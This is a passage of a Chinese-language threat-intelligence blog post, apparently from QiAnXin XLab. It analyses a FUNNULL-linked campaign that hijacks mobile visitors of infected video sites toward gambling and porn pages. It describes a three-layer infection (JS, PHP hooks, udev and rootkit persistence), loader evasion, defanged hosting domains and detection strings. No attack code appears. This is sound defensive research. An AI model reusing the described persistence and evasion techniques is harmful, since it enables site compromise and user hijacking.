Badhide2s&#x7B49;&#x591A;&#x4E2A;&#x4E13;&#x4E1A;&#x5316;&#x7EC4;&#x4EF6;&#xFF0C;&#x5E76;&#x4E14;&#x4F7F;&#x7528;&#x975E;&#x5E38;&#x5C11;&#x89C1;&#x7684;UDEV&#x673A;&#x5236;&#x5B9E;&#x73B0;&#x6301;&#x4E45;&#x5316;&#x3002;&#x8FD9;&#x4E9B;&#x7EC4;&#x4EF6;&#x8BBE;&#x8BA1;&#x7CBE;&#x826F;&#xFF0C;&#x5206;&#x5DE5;&#x6781;&#x5176;&#x660E;&#x786E;&#xFF0C;&#x4E0D;&#x662F;&#x811A;&#x672C;&#x5C0F;&#x5B50;&#x7684;&#x968F;&#x624B;&#x4E4B;&#x4F5C;&#xFF0C;&#x800C;&#x662F;&#x4E00;&#x4E2A;&#x6210;&#x719F;&#x7684;&#x5DE5;&#x7A0B;&#x5316;&#x9ED1;&#x4EA7;&#x653B;&#x51FB;&#x5957;&#x4EF6;&#x3002;</p>
<ol start="3">
<li>&#x5F71;&#x54CD;&#x767E;&#x4E07;&#x7EA7;&#x7528;&#x6237;&#xFF0C;&#x53D7;&#x5BB3;&#x8005;&#x9677;&#x5165;&quot;&#x6E05;&#x7406;&#x53C8;&#x611F;&#x67D3;&quot;&#x7684;&#x6B7B;&#x5FAA;&#x73AF;&#x3002;</li>
</ol>
<p>&#x4ECE;&#x6211;&#x4EEC;&#x7684;&#x76D1;&#x6D4B;&#x6570;&#x636E;&#x6765;&#x770B;&#xFF1A;&#x5355;&#x65E5;&#x53BB;&#x91CD;&#x5BA2;&#x6237;&#x7AEF;&#x5CF0;&#x503C;&#x8FBE;58&#x4E07;&#xFF08;&#x800C;&#x6211;&#x4EEC;&#x7684;&#x6570;&#x636E;&#x6E90;&#x4EC5;&#x5360;&#x56FD;&#x5185;&#x7EA6;5%&#x7684;&#x5E02;&#x573A;&#x4EFD;&#x989D;&#xFF09;&#xFF0C;&#x4FDD;&#x5B88;&#x63A8;&#x7B97;&#x5168;&#x56FD;&#x65E5;&#x5747;&#x8D85;&#x8FC7;&#x767E;&#x4E07;&#x7528;&#x6237;&#x88AB;&#x52AB;&#x6301;&#x81F3;&#x535A;&#x5F69;&#x3001;&#x8272;&#x60C5;&#x7B49;&#x975E;&#x6CD5;&#x7AD9;&#x70B9;&#x3002;10,748&#x4E2A;IP&#x88AB;&#x786E;&#x8BA4;&#x611F;&#x67D3;&#xFF0C;&#x7EDD;&#x5927;&#x591A;&#x6570;&#x4E3A;&#x5F71;&#x89C6;&#x7AD9;&#x70B9;&#x3002;Badredis2s&#x7684;C2&#x57DF;&#x540D;&#x6392;&#x8FDB;Tranco&#x5168;&#x7403;&#x7F51;&#x7AD9;&#x6392;&#x540D;&#x524D;50&#x4E07;&#xFF0C;&#x6D3B;&#x8DC3;&#x7A0B;&#x5EA6;&#x6781;&#x9AD8;&#x3002;&#x66F4;&#x68D8;&#x624B;&#x7684;&#x662F;&#xFF0C;&#x5927;&#x91CF;&#x53D7;&#x5BB3;&#x7AD9;&#x957F;&#x9677;&#x5165;&#x53CD;&#x590D;&#x611F;&#x67D3;&#x7684;&#x56F0;&#x5883;&#x3002;&#x539F;&#x56E0;&#x5728;&#x4E8E;&#x611F;&#x67D3;&#x662F;&#x4E09;&#x5C42;&#x7ED3;&#x6784;&#xFF0C;&#x53EA;&#x6E05;&#x7406;&#x8868;&#x9762;&#x7B49;&#x4E8E;&#x53EA;&#x64E6;&#x6389;&#x4E86;&#x75C7;&#x72B6;&#xFF0C;&#x5FC5;&#x987B;&#x4E09;&#x5C42;&#x5168;&#x90E8;&#x6E05;&#x9664;&#xFF0C;&#x5426;&#x5219;&#x5FC5;&#x5B9A;&#x590D;&#x53D1;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_user.jpg" alt="ring_user.jpg" loading="lazy"></p>
<ul>
<li>
<p>&#x7B2C;&#x4E00;&#x5C42;&#xFF08;&#x8868;&#x9762;&#xFF09;&#xFF1A;&#x88AB;&#x7BE1;&#x6539;&#x7684;JS&#x6587;&#x4EF6;&#x3002; &#x8FD9;&#x662F;&#x591A;&#x6570;&#x4EBA;&#x53D1;&#x73B0;&#x7684;&#x75C7;&#x72B6;&#xFF0C;&#x6E05;&#x9664;&#x540E;&#x77ED;&#x6682;&#x6062;&#x590D;&#x3002;</p>
</li>
<li>
<p>&#x7B2C;&#x4E8C;&#x5C42;&#xFF08;&#x4E2D;&#x95F4;&#xFF09;&#xFF1A;PHP&#x6076;&#x610F;&#x8F7D;&#x8377;&#x3002; &#x6076;&#x610F;PHP&#x8F7D;&#x8377;&#x5728;thinkphp&#x6846;&#x67B6;&#x4E2D;&#x6CE8;&#x518C;&#x94A9;&#x5B50;&#xFF0C;&#x6BCF;&#x4E00;&#x4E2A;&#x88AB;&#x6E32;&#x67D3;&#x7684;&#x9875;&#x9762;&#x90FD;&#x4F1A;&#x88AB;&#x81EA;&#x52A8;&#x91CD;&#x65B0;&#x611F;&#x67D3;&#xFF0C;&#x4E0D;&#x6E05;&#x9664;PHP&#x540E;&#x95E8;&#xFF0C;JS&#x6C38;&#x8FDC;&#x6E05;&#x4E0D;&#x5E72;&#x51C0;&#x3002;</p>
</li>
<li>
<p>&#x7B2C;&#x4E09;&#x5C42;&#xFF08;&#x6839;&#x6E90;&#xFF09;&#xFF1A;&#x5B98;&#x65B9;&#x5347;&#x7EA7;&#x901A;&#x9053; / &#x7CFB;&#x7EDF;&#x7EA7;&#x6301;&#x4E45;&#x5316;&#x3002; &#x5BF9;maccms.la&#x7528;&#x6237;&#xFF0C;&#x6BCF;&#x6B21;&#x68C0;&#x67E5;&#x66F4;&#x65B0;&#x90FD;&#x53EF;&#x80FD;&#x4F1A;&#x91CD;&#x65B0;&#x4E0B;&#x53D1;&#x6076;&#x610F;&#x4EE3;&#x7801;&#xFF1B;&#x5BF9;RingH23&#x53D7;&#x5BB3;&#x8005;&#xFF0C;udev&#x89C4;&#x5219;&#x5728;&#x91CD;&#x542F;&#x540E;&#x81EA;&#x52A8;&#x6062;&#x590D;&#x540E;&#x95E8;&#xFF0C;Rootkit&#x9690;&#x85CF;&#x4E00;&#x5207;&#x75D5;&#x8FF9;&#x3002;</p>
</li>
</ul>
<ol start="4">
<li>CDN1.AI&#x6781;&#x5EA6;&#x53EF;&#x7591;&#xFF0C;&#x5F88;&#x53EF;&#x80FD;&#x662F;FUNNULL&#x7684;&#x65B0;&#x9A6C;&#x7532;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x3002;</li>
</ol>
<p>Funnull&#x7528;&#x4E8E;&#x6258;&#x7BA1;&#x6076;&#x610F;JS&#x811A;&#x672C;&#x7684;&#x57DF;&#x540D;&#x8FD1;&#x671F;&#x96C6;&#x4F53;&#x8FC1;&#x79FB;&#x81F3;CDN1.AI&#x3002;CDN1&#x4E8E;2025&#x5E74;6&#x6708;&#x624D;&#x521B;&#x5EFA;&#xFF0C;&#x5374;&#x5728;&#x6781;&#x77ED;&#x65F6;&#x95F4;&#x5185;&#x88AB;FUNNULL&#x5168;&#x9762;&#x91C7;&#x7528;&#x3002;&#x7136;&#x800C;&#x81EA;&#x8EAB;&#x8FD0;&#x7EF4;&#x6C34;&#x5E73;&#x7C97;&#x7CD9;&#x2014;&#x2014;&#x5B98;&#x65B9;&#x7F51;&#x7AD9;&#x8BC1;&#x4E66;&#x8FC7;&#x671F;&#x90FD;&#x672A;&#x5904;&#x7406;&#xFF0C;&#x660E;&#x663E;&#x4E0D;&#x7B26;&#x5408;&#x4E00;&#x4E2A;&#x6B63;&#x89C4;CDN&#x670D;&#x52A1;&#x5546;&#x7684;&#x8868;&#x73B0;&#x3002;&#x7EFC;&#x5408;&#x5176;&#x5FEB;&#x901F;&#x83B7;&#x5F97;&#x4FE1;&#x4EFB;&#x7684;&#x5F02;&#x5E38;&#x6A21;&#x5F0F;&#x4E0E;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x9AD8;&#x5EA6;&#x540C;&#x6B65;&#x7684;&#x8FC1;&#x79FB;&#x65F6;&#x673A;&#xFF0C;&#x6211;&#x4EEC;&#x63A8;&#x6D4B;CDN1.AI&#x5E76;&#x975E;&#x771F;&#x6B63;&#x7684;&#x7B2C;&#x4E09;&#x65B9;CDN&#xFF0C;&#x800C;&#x662F;FUNNULL&#x4E3A;&#x89C4;&#x907F;&#x8FFD;&#x8E2A;&#x800C;&#x542F;&#x7528;&#x7684;&#x65B0;&#x9A6C;&#x7532;&#xFF0C;&#x8FD9;&#x610F;&#x5473;&#x7740;&#x8BE5;&#x56E2;&#x4F19;&#x6B63;&#x5728;&#x4E3B;&#x52A8;&#x6784;&#x5EFA;&#x65B0;&#x7684;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x5C42;&#x3002;</p>
<ol start="5">
<li>&#x9ED1;&#x4EA7;&#x8FD0;&#x7528;&#x7CBE;&#x7EC6;&#x5316;&#x8FD0;&#x8425;&#x903B;&#x8F91;&#xFF0C;&#x9488;&#x5BF9;&#x6027;&#x6781;&#x5F3A;&#x3002;</li>
</ol>
<p>&#x653B;&#x51FB;&#x4E3B;&#x8981;&#x9488;&#x5BF9;&#x624B;&#x673A;&#x7528;&#x6237;&#xFF0C;&#x8BBE;&#x6709;&#x5730;&#x533A;&#x9650;&#x5236;&#xFF08;&#x76EE;&#x524D;&#x4EC5;&#x4E2D;&#x56FD;&#x65F6;&#x533A;&#x89E6;&#x53D1;&#xFF09;&#x548C;&#x5206;&#x65F6;&#x6BB5;&#x6982;&#x7387;&#x673A;&#x5236;&#x3002;&#x4F8B;&#x5982;&#x51CC;&#x6668;4-7&#x70B9;&#x7684;&#x52AB;&#x6301;&#x6982;&#x7387;&#x9AD8;&#x8FBE;80%&#xFF0C;&#x5229;&#x7528;&#x7684;&#x6B63;&#x662F;&#x7528;&#x6237;&#x6DF1;&#x591C;&#x75B2;&#x60EB;&#x3001;&#x81EA;&#x63A7;&#x529B;&#x4E0B;&#x964D;&#x7684;&#x5FC3;&#x7406;&#x7A97;&#x53E3;&#x3002;</p>
<p>&#x66F4;&#x503C;&#x5F97;&#x8B66;&#x60D5;&#x7684;&#x662F;&#x653B;&#x51FB;&#x8005;&#x7684;&#x7528;&#x6237;&#x753B;&#x50CF;&#x7B56;&#x7565;&#xFF1A;&#x6839;&#x636E;&#x9875;&#x9762;&#x5185;&#x5BB9;&#x5173;&#x952E;&#x8BCD;&#x5224;&#x65AD;&#x8BBF;&#x5BA2;&#x7C7B;&#x578B;&#xFF0C;&#x5B9E;&#x65BD;&#x5DEE;&#x5F02;&#x5316;&#x5BFC;&#x6D41;&#xFF0C;&#x8FD9;&#x5957;&#x7528;&#x6237;&#x753B;&#x50CF;&#x4E0E;&#x5206;&#x65F6;&#x6BB5;&#x6982;&#x7387;&#x6295;&#x653E;&#x7684;&#x8FD0;&#x8425;&#x903B;&#x8F91;&#xFF0C;&#x582A;&#x6BD4;&#x6B63;&#x89C4;&#x516C;&#x53F8;&#x7684;&#x7CBE;&#x7EC6;&#x5316;&#x8FD0;&#x8425;&#x6C34;&#x5E73;&#x3002;</p>
<ul>
<li>&#x5BF9;&#x8BBF;&#x95EE;&#x6B63;&#x5E38;&#x5185;&#x5BB9;&#x7684;&#x7528;&#x6237;&#xFF08;&quot;&#x6B63;&#x7ECF;&#x6D41;&#x91CF;&quot;&#xFF09;&#xFF1A;&#x4F18;&#x5148;&#x63A8;&#x9001;&#x5165;&#x95E8;&#x7EA7;&#x8272;&#x60C5;&#x548C;&#x64E6;&#x8FB9;&#x5185;&#x5BB9;&#xFF0C;&#x964D;&#x4F4E;&#x5FC3;&#x7406;&#x95E8;&#x69DB;&#xFF0C;&#x9010;&#x6B65;&#x5F15;&#x5BFC;&#x8F6C;&#x5316;&#x3002;</li>
<li>&#x5BF9;&#x5DF2;&#x5728;&#x8BBF;&#x95EE;&#x7070;&#x8272;&#x5185;&#x5BB9;&#x7684;&#x7528;&#x6237;&#xFF08;&quot;&#x9AD8;&#x4EF7;&#x503C;&#x6D41;&#x91CF;&quot;&#xFF09;&#xFF1A;&#x76F4;&#x63A5;&#x5BF9;&#x63A5;&#x4E0A;&#x6E38;&#x8D4C;&#x535A;&#x5E73;&#x53F0;&#x3001;&#x9AD8;&#x5BA2;&#x5355;&#x4EF7;&#x8272;&#x60C5;&#x7AD9;&#x70B9;&#xFF0C;&#x52A0;&#x901F;&#x6C89;&#x8FF7;&#xFF0C;&#x6700;&#x5927;&#x5316;&#x7528;&#x6237;&#x4EA7;&#x51FA;&#x3002;</li>
</ul>
<h1 id="%E7%99%BE%E4%B8%87%E7%BA%A7%E5%88%AB%E7%9A%84%E5%BD%B1%E5%93%8D%E8%A7%84%E6%A8%A1">&#x767E;&#x4E07;&#x7EA7;&#x522B;&#x7684;&#x5F71;&#x54CD;&#x89C4;&#x6A21;</h1>
<p>&#x57FA;&#x4E8E;&#x73B0;&#x6709;&#x76D1;&#x6D4B;&#x6570;&#x636E;&#xFF0C;&#x867D;&#x7136;&#x96BE;&#x4EE5;&#x7CBE;&#x786E;&#x91CF;&#x5316;&#x6B64;&#x6B21;&#x9ED1;&#x4EA7;&#x6D3B;&#x52A8;&#x7684;&#x603B;&#x4F53;&#x611F;&#x67D3;&#x89C4;&#x6A21;&#xFF0C;&#x4F46;&#x901A;&#x8FC7;<strong>&#x88AB;&#x611F;&#x67D3;&#x7684;&#x7F51;&#x7AD9;&#xFF0C;C2&#x6392;&#x540D;&#xFF0C;&#x4EE5;&#x53CA;&#x6076;&#x610F;JS&#x88AB;&#x8BBF;&#x95EE;&#x7684;&#x8D8B;&#x52BF;</strong>&#x4E09;&#x4E2A;&#x7EF4;&#x5EA6;&#x7684;&#x89C2;&#x6D4B;&#xFF0C;&#x5DF2;&#x80FD;&#x5145;&#x5206;&#x5370;&#x8BC1;&#x5176;&#x5E7F;&#x6CDB;&#x7684;&#x5F71;&#x54CD;&#x3002;</p>
<h2 id="0x1-%E6%8E%A2%E6%B5%8B%E8%A2%AB%E6%84%9F%E6%9F%93%E7%9A%84%E7%BD%91%E7%AB%99">0x1: &#x63A2;&#x6D4B;&#x88AB;&#x611F;&#x67D3;&#x7684;&#x7F51;&#x7AD9;</h2>
<p>&#x690D;&#x5165;&#x5230;&#x7F51;&#x9875;&#x4E2D;&#x7684;JS&#x4EE3;&#x7801;&#x6709;&#x975E;&#x5E38;&#x5F3A;&#x7684;&#x7279;&#x5F81;&#xFF0C;&#x5982;&#x201C;function xxSJRox&#x201D;&#xFF0C;&#x201C;MfXKwV&#x201D;&#xFF0C;&#x201C;ptbnNbK&#x201D;&#x7B49;&#x5B57;&#x4E32;&#xFF0C;&#x901A;&#x8FC7;&#x8D44;&#x4EA7;&#x6D4B;&#x7ED8;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;10748&#x4E2A;IP&#x547D;&#x4E2D;&#x8FD9;&#x4E00;&#x7279;&#x5F81;&#xFF0C;&#x5B83;&#x4EEC;&#x4E2D;&#x7684;&#x5927;&#x591A;&#x6570;&#x662F;&#x5F71;&#x89C6;&#x7AD9;&#x70B9;&#x3002;&#x503C;&#x5F97;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF0C;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x662F;&#x52A8;&#x6001;&#x6CE8;&#x5165;&#xFF0C;&#x5F88;&#x591A;&#x5B9E;&#x9645;&#x5DF2;&#x88AB;&#x611F;&#x67D3;&#x7684;&#x7F51;&#x7AD9;&#x53EF;&#x80FD;&#x4E0D;&#x4F1A;&#x88AB;&#x6D4B;&#x7ED8;&#x53D1;&#x73B0;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_hunter.png" alt="ring_hunter.png" loading="lazy"></p>
<h2 id="0x2-c2%E7%9A%84%E6%8E%92%E5%90%8D">0x2: C2&#x7684;&#x6392;&#x540D;</h2>
<p>Tranco &#x6392;&#x540D;&#x662F;&#x4E00;&#x4E2A;&#x7528;&#x4E8E;&#x8861;&#x91CF;&#x7F51;&#x7AD9;&#x6D41;&#x884C;&#x5EA6;&#x7684;&#x7EFC;&#x5408;&#x6027;&#x6392;&#x540D;&#x7CFB;&#x7EDF;&#xFF0C;&#x65E8;&#x5728;&#x63D0;&#x4F9B;&#x66F4;&#x51C6;&#x786E;&#x3001;&#x66F4;&#x53EF;&#x9760;&#x7684;&#x5168;&#x7403;&#x7F51;&#x7AD9;&#x6392;&#x540D;&#x6570;&#x636E;&#x3002;&#x5B83;&#x7ED3;&#x5408;&#x4E86;Cisco Umbrella&#xFF0C;Majestic&#xFF0C;Farsight&#xFF0C;Cloudflare Radar&#xFF0C;Chrome &#x7528;&#x6237;&#x4F53;&#x9A8C;&#x62A5;&#x544A;&#x7B49;&#x591A;&#x4E2A;&#x6570;&#x636E;&#x6E90;&#xFF0C;&#x662F;&#x5B66;&#x672F;&#x754C;&#x5E7F;&#x6CDB;&#x4F7F;&#x7528;&#x7684;&#x5DE5;&#x5177;&#x3002;&#x76EE;&#x524D;&#xFF0C;Badredis2s&#x7684;&#x5927;&#x90E8;&#x5206;C2&#x90FD;&#x6392;&#x5728;<strong>&#x5168;&#x7403;&#x7F51;&#x7AD9;&#x6392;&#x540D;50&#x4E07;&#x5DE6;&#x53F3;&#xFF0C;&#x6D3B;&#x8DC3;&#x7A0B;&#x5EA6;&#x975E;&#x5E38;&#x9AD8;</strong>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_tranco.png" alt="ring_tranco.png" loading="lazy"></p>
<h2 id="0x3-%E6%81%B6%E6%84%8Fjs%E8%A2%AB%E8%AE%BF%E9%97%AE%E7%9A%84%E8%B6%8B%E5%8A%BF">0x3: &#x6076;&#x610F;JS&#x88AB;&#x8BBF;&#x95EE;&#x7684;&#x8D8B;&#x52BF;</h2>
<p>&#x6211;&#x4EEC;&#x5728;&#x6EAF;&#x6E90;&#x8FC7;&#x7A0B;&#x4E2D;&#x53C8;&#x53D1;&#x73B0;&#x4E86;3&#x4E2A;&#x65B0;&#x7684;&#x6076;&#x610F;JS&#x6258;&#x7BA1;&#x7AD9;&#x70B9;&#xFF1A;bdustatic[.]com&#xFF0C;jsdelivr[.]vip&#x4EE5;&#x53CA;macoms[.]la&#x3002;&#x4ECE;&#x7EDF;&#x8BA1;&#x6570;&#x636E;&#x6765;&#x770B;&#xFF0C;&#x5355;&#x65E5;&#x53BB;&#x91CD;&#x540E;&#x7684;&#x5BA2;&#x6237;&#x7AEF;&#x5CF0;&#x503C;&#x4E3A;58&#x4E07;&#xFF0C;&#x5F53;&#x524D;&#x6570;&#x503C;&#x7565;&#x6709;&#x4E0B;&#x964D;&#xFF0C;&#x4FDD;&#x6301;&#x5728;20&#x4E07;&#x5DE6;&#x53F3;&#x3002; &#x8003;&#x8651;&#x5230;&#x6570;&#x636E;&#x6765;&#x6E90;&#x7684;&#x5E02;&#x573A;&#x5360;&#x6709;&#x7387;&#xFF0C;<strong>&#x4FDD;&#x5B88;&#x8BC4;&#x4F30;&#x6BCF;&#x5929;&#x8D85;&#x8FC7;&#x767E;&#x4E07;&#x7528;&#x6237;&#x53D7;&#x8FD9;&#x4E9B;&#x6076;&#x610F;JS&#x80CC;&#x540E;&#x975E;&#x6CD5;&#x7AD9;&#x70B9;&#x7684;&#x5F71;&#x54CD;</strong>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_jstrend.png" alt="ring_jstrend.png" loading="lazy"></p>
<h1 id="%E6%AD%BB%E7%81%B0%E5%A4%8D%E7%87%83%E7%9A%84funnull%E9%BB%91%E4%BA%A7">&#x6B7B;&#x7070;&#x590D;&#x71C3;&#x7684;FUNNULL&#x9ED1;&#x4EA7;</h1>
<h2 id="0x1-%E5%BD%92%E5%B1%9E%E4%BA%8Efunnull%E7%9A%84%E5%8E%9F%E5%9B%A0">0x1: &#x5F52;&#x5C5E;&#x4E8E;FUNNULL&#x7684;&#x539F;&#x56E0;</h2>
<p>Funnull&#x4F5C;&#x4E3A;&#x4E1C;&#x5357;&#x4E9A;&#x9ED1;&#x4EA7;&#x751F;&#x6001;&#x4E2D;&#x7684;&#x4E0A;&#x6E38;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x63D0;&#x4F9B;&#x5546;&#xFF0C;&#x4E3B;&#x8981;&#x901A;&#x8FC7;&#x4ECE; AWS&#x3001;Azure &#x7B49;&#x4E91;&#x5382;&#x5546;&#x6279;&#x91CF;&#x91C7;&#x8D2D;&#x5E72;&#x51C0; IP &#x5730;&#x5740;&#xFF0C;&#x518D;&#x7ED3;&#x5408; DGA &#x751F;&#x6210;&#x5927;&#x91CF;&#x57DF;&#x540D;&#x540E;&#x201C;&#x6D17;&#x767D;&#x201D;&#x8F6C;&#x552E;&#x7ED9;&#x4E0B;&#x6E38;&#x8BC8;&#x9A97;&#x56E2;&#x4F19;&#xFF0C;&#x4ECE;&#x800C;&#x652F;&#x6491;&#x6740;&#x732A;&#x76D8;&#x3001;&#x5047;&#x6295;&#x8D44;&#x5E73;&#x53F0;&#x7B49;&#x8BC8;&#x9A97;&#x6D3B;&#x52A8;&#x3002;&#x7136;&#x800C;&#xFF0C;&#x5728;polyfill.io&#x3001;bootcdn.net&#x3001;staticfile.org&#x7B49;&#x591A;&#x6B21;CDN&#x6295;&#x6BD2;&#x4E8B;&#x4EF6;&#x4E2D;&#xFF0C;Funnull&#x5E76;&#x975E;&#x4EC5;&#x5145;&#x5F53;&#x88AB;&#x52A8;&#x4F9B;&#x5E94;&#x5546;&#xFF0C;&#x800C;&#x662F;&#x4EB2;&#x81EA;&#x4E0B;&#x573A;&#x64CD;&#x4F5C;&#xFF0C;&#x76F4;&#x63A5;&#x6536;&#x8D2D;&#x57DF;&#x540D;&#x5E76;&#x5728;&#x690D;&#x5165;&#x6076;&#x610F;JS&#x4EE3;&#x7801;&#x3002;&#x8FD9;&#x4E9B;&#x201C;&#x81EA;&#x5DF1;&#x4EB2;&#x81EA;&#x4E0B;&#x573A;&#x5E72;&#x9ED1;&#x6D3B;&#x201D;&#x7684;&#x4E8B;&#x4EF6;&#xFF0C;<strong>&#x5F3A;&#x70C8;&#x8868;&#x660E;&#x6295;&#x6BD2;&#x6240;&#x4F7F;&#x7528;&#x7684;&#x811A;&#x672C;&#x5B8C;&#x5168;&#x96B6;&#x5C5E;&#x4E8E;Funnull&#x81EA;&#x8EAB;</strong>&#x3002;&#x56E0;&#x4E3A;&#x8FD9;&#x4E9B;&#x811A;&#x672C;&#x76F4;&#x63A5;&#x627F;&#x62C5;&#x6838;&#x5FC3;&#x7684;&#x6076;&#x610F;&#x8DF3;&#x8F6C;&#x4E0E;&#x6D41;&#x91CF;&#x52AB;&#x6301;&#x529F;&#x80FD;&#xFF0C;&#x53EA;&#x6709;&#x7262;&#x7262;&#x638C;&#x63E1;&#x63A7;&#x5236;&#x6743;&#xFF0C;&#x624D;&#x80FD;&#x786E;&#x4FDD;&#x9ED1;&#x4EA7;&#x94FE;&#x6761;&#x7684;&#x9AD8;&#x6548;&#x8FD0;&#x8F6C;&#xFF0C;&#x6700;&#x5927;&#x5316;&#x5206;&#x6210;&#x6536;&#x76CA;&#xFF0C;&#x5E76;&#x907F;&#x514D;&#x4E0B;&#x6E38;&#x56E2;&#x4F19;&#x968F;&#x610F;&#x4FEE;&#x6539;&#x5BFC;&#x81F4;&#x7684;&#x6548;&#x7387;&#x635F;&#x5931;&#x6216;&#x5206;&#x6210;&#x4E89;&#x8BAE;&#x3002;</p>
<p>&#x6839;&#x636E;&#x8FD9;&#x4E00;&#x6280;&#x672F;&#x63A8;&#x8BBA;&#xFF0C;&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;<strong>JavaScript&#x811A;&#x672C;&#x7684;&#x7279;&#x5F81;&#x53EF;&#x4F5C;&#x4E3A;&#x653B;&#x51FB;&#x5F52;&#x5C5E;&#x5224;&#x5B9A;&#x7684;&#x5173;&#x952E;&#x4F9D;&#x636E;</strong>&#x3002;Funnull&#x7684;&#x811A;&#x672C;&#x53EF;&#x5206;&#x4E3A;JS Loader&#xFF08;&#x52A0;&#x8F7D;&#x5668;&#xFF09;&#x548C;JS Redirector&#xFF08;&#x91CD;&#x5B9A;&#x5411;&#x5668;&#xFF09;&#x4E24;&#x5927;&#x7C7B;&#xFF0C;&#x5B83;&#x4EEC;&#x5171;&#x540C;&#x6784;&#x6210;&#x4E86;&#x4E00;&#x4E2A;&#x6D41;&#x91CF;&#x91CD;&#x5B9A;&#x5411;&#x6846;&#x67B6;&#x3002;&#x5176;&#x4E2D;&#xFF0C;JS Load&#x5668;&#x7684;&#x529F;&#x80FD;&#x662F;&#x52A8;&#x6001;&#x52A0;&#x8F7D;&#x4F2A;&#x88C5;&#x6210;jQuery&#x5E93;&#x7684;Redirector&#x6709;&#x6548;&#x8F7D;&#x8377;&#xFF1B;&#x800C;Redirector&#x5219;&#x8D1F;&#x8D23;&#x5C06;&#x7B26;&#x5408;&#x9884;&#x8BBE;&#x6761;&#x4EF6;&#x7684;&#x7528;&#x6237;&#x8BF7;&#x6C42;&#xFF0C;&#x52AB;&#x6301;&#x5E76;&#x8F6C;&#x5411;&#x8D4C;&#x535A;&#x3001;&#x8272;&#x60C5;&#x7B49;&#x975E;&#x6CD5;&#x7AD9;&#x70B9;</p>
<h4 id="%E2%91%A0-js-loader%E7%9B%B8%E4%BC%BC%E6%80%A7">&#x2460; JS Loader&#x76F8;&#x4F3C;&#x6027;</h4>
<p>Loader&#x6838;&#x5FC3;&#x903B;&#x8F91;&#x662F;&#x901A;&#x8FC7;&#x73AF;&#x5883;&#x68C0;&#x6D4B;&#x548C;&#x53CD;&#x8C03;&#x8BD5;&#x624B;&#x6BB5;&#xFF0C;&#x5728;&#x7279;&#x5B9A;&#x8BBE;&#x5907;&#x4E0A;&#x9690;&#x853D;&#x52A0;&#x8F7D;&#x5916;&#x90E8;&#x8D44;&#x6E90;&#x3002;&#x4EE3;&#x7801;&#x4F7F;&#x7528;Base64&#x9690;&#x85CF;&#x771F;&#x5B9E;URL&#xFF0C;&#x901A;&#x8FC7;&#x5B57;&#x7B26;&#x4E32;&#x62FC;&#x63A5;<strong>&#x52A8;&#x6001;&#x521B;&#x5EFA;script&#x6807;&#x7B7E;&#x52A0;&#x8F7D;&#x4F2A;&#x88C5;&#x7684;Query&#x5E93;</strong>&#xFF0C;&#x4F46;&#x4EC5;&#x9488;&#x5BF9;&#x975E;Mac/Windows&#x5E73;&#x53F0;&#xFF08;&#x79FB;&#x52A8;&#x8BBE;&#x5907;/Linux&#xFF09;&#x6267;&#x884C;&#x3002;&#x672C;&#x6B21;&#x6D3B;&#x52A8;&#x6355;&#x83B7;&#x7684;Loader&#x4EE3;&#x7801;&#x4E0E;2023&#x5E74;BootCDN&#x6295;&#x6BD2;&#x4E8B;&#x4EF6;&#x4E2D;&#x6240;&#x7528;&#x4EE3;&#x7801;&#x5B8C;&#x5168;&#x4E00;&#x81F4;&#xFF0C;&#x5305;&#x62EC;&#x73AF;&#x5883;&#x5224;&#x65AD;&#x903B;&#x8F91;&#x3001;&#x89E3;&#x7801;&#x51FD;&#x6570;&#x7ED3;&#x6784;&#x3001;&#x53C2;&#x6570;&#x547D;&#x540D;&#x7B49;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_jsloadercmp.png" alt="ring_jsloadercmp.png" loading="lazy"></p>
<p>&#x53E6;&#x5916;&#x503C;&#x5F97;&#x4E00;&#x63D0;&#x7684;&#x662F;&#xFF0C;<strong>macoms.la</strong>&#x8FD9;&#x4E2A;&#x57DF;&#x540D;&#x540C;&#x65F6;&#x51FA;&#x73B0;&#x5728;&#x4E86;&#x53E6;&#x5916;&#x4E24;&#x8D77;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x4E2D;&#xFF1A;Polyfill&#x4F9B;&#x5E94;&#x94FE;&#x653B;&#x51FB;&#x4E0E;GoEdge&#x5B98;&#x65B9;&#x6295;&#x6BD2;&#x3002;&#x524D;&#x8005;&#x5DF2;&#x88AB;&#x591A;&#x5BB6;&#x5B89;&#x5168;&#x5382;&#x5546;&#x548C;&#x793E;&#x533A;&#x516C;&#x5F00;&#x5206;&#x6790;&#x5E76;&#x5224;&#x5B9A;&#x4E3A;Funnull&#x4E3B;&#x5BFC;&#xFF1B;&#x540E;&#x8005;&#x867D;&#x6682;&#x65E0;&#x5B8C;&#x6574;&#x516C;&#x5F00;&#x5206;&#x6790;&#x62A5;&#x544A;&#xFF0C;&#x4F46;&#x57FA;&#x4E8E;&#x57DF;&#x540D;&#x590D;&#x7528;&#x3001;&#x6D41;&#x91CF;&#x52AB;&#x6301;&#x6A21;&#x5F0F;&#x7684;&#x4E00;&#x81F4;&#x6027;&#x8BA9;&#x6211;&#x4EEC;&#x6709;&#x5145;&#x5206;&#x7406;&#x7531;&#x76F8;&#x4FE1;<strong>GoEdge&#x6295;&#x6BD2;&#x4E8B;&#x4EF6;&#x540C;&#x6837;&#x51FA;&#x81EA;Funnull&#x56E2;&#x4F19;&#x4E4B;&#x624B;</strong>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_goedge.png" alt="ring_goedge.png" loading="lazy"></p>
<h4 id="%E2%91%A1-js-redirector%E7%9B%B8%E4%BC%BC%E6%80%A7">&#x2461; JS Redirector&#x76F8;&#x4F3C;&#x6027;</h4>
